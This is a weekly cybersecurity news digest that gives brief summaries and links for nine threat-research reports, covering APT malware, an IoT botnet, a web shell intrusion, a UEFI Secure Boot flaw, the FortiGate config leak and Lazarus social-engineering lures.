Welcome to the weekly digest about the Cybersecurity & Threats in the wild. Below you will find a very subjective summary of Cybersecurity events for the prior week.
1.ANDROID MALWARE IN DONOT APT OPERATIONS by @CyfirmaR
- Indian APT that serves Indian national interests
- designed for intelligence gathering against internal threats
- uses an innocent customer engagement platform for malicious purposes
https://www.cyfirma.com/research/android-malware-in-donot-apt-operations/
2.IoT Botnet Linked to Large-scale DDoS Attacks Since the End of 2024 by @TrendMicro
- since end of 2024 large-scale DDoS attacks targeting companies in Japan, issued from the command-and-control (C&C) servers of an IoT botnet that has been attacking various countries globally
- botnet comprises malware variants derived from Mirai & Bashlite and infects IoT devices by exploiting vulns and weak creds
- commands include those that can incorporate various DDoS attack methods, update malware, and enable proxy services
- primary devices used in the botnet were wireless routers and IP cameras from well-known brands
https://www.trendmicro.com/en_us/research/25/a/iot-botnet-linked-to-ddos-attacks.html
3.Investigating A Web Shell Intrusion With Trend Micro™ Managed XDR by @TrendMicro
- endpoint sensors detected Internet Information Services IIS worker (w3wp.exe) executing suspicious activity
- attacker was able to upload web shell to IIS worker, which, at the time of the attack, was unrestricted
- attacker utilized encoded PowerShell command to create reverse TCP shell that connected to IP address for command-and-control
4. Under the cloak of UEFI Secure Boot: Introducing CVE-2024-7344 by @ESETresearch
- vulnerability allows execution of untrusted code during system boot, enabling deployment of malicious UEFI bootkits
- all UEFI systems with Microsoft third-party UEFI signing enabled are affected
- issue was fixed by affected vendors and old, vulnerable binaries were revoked by Microsoft on Jan 14th, 2025
5. One Step Ahead in Cyber Hide-and-Seek: Automating Malicious Infrastructure Discovery With Graph Neural Networks by #PaloAlto’s #Unit42
- Using network crawler leveraging relationships among domains, discovered network artifacts around known indicators and trained agraph neural network (GNN) to detect additional malicious domains
https://unit42.paloaltonetworks.com/graph-neural-networks
6. MintsLoader: StealC and BOINC Delivery by @esthreat
- ongoing campaign involving MintsLoader odelivering second stage payloads like Stealc and the Berkeley Open Infrastructure for Network Computing (BOINC) client
- PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file
- features a Domain Generation Algorithm (DGA) with a seed value based on the addition of the current day of the month and a constant, combined with anti-VM techniques to evade sandboxes and malware researchers
https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery
7.Deep Dive Into a Linux Rootkit Malware by #FORTIGUARD LABS
- follow-up analysis to how remote attackers exploited multiple vulnerabilities in an appliance to gain control of a customer’s system
https://www.fortinet.com/blog/threat-research/deep-dive-into-a-linux-rootkit-malware
8. Massive FortiGate Config Leak: Assessing the Impact by @censysio
- new hacker group leaked full Fortinet FortiGate firewall configs, including plaintext creds, for over 15k devices from compromise dating back to 2022
- As of January 17, of 15,4k distinct compromised hosts, over half are still online and reachable in scans, and 32.88% are still exposing their FortiGate web login interfaces
https://censys.com/fortigate-config-leak-impact
9. Lazarus APT: Techniques for Hunting Contagious Interview by @ValidinLLC
- using the ClickFix social engineering technique to trick job seekers into copying and pasting malicious code onto their devices during fake video job interviews (“Contagious Interview”)
- hows how to expand and pivot from threat intelligence using Validin to detect likely-related infrastructure and mitigate this threat
https://www.validin.com/blog/inoculating_contagious_interview_with_validin
Thank you for reading.
Please add interesting items you came across during the week in the comments below.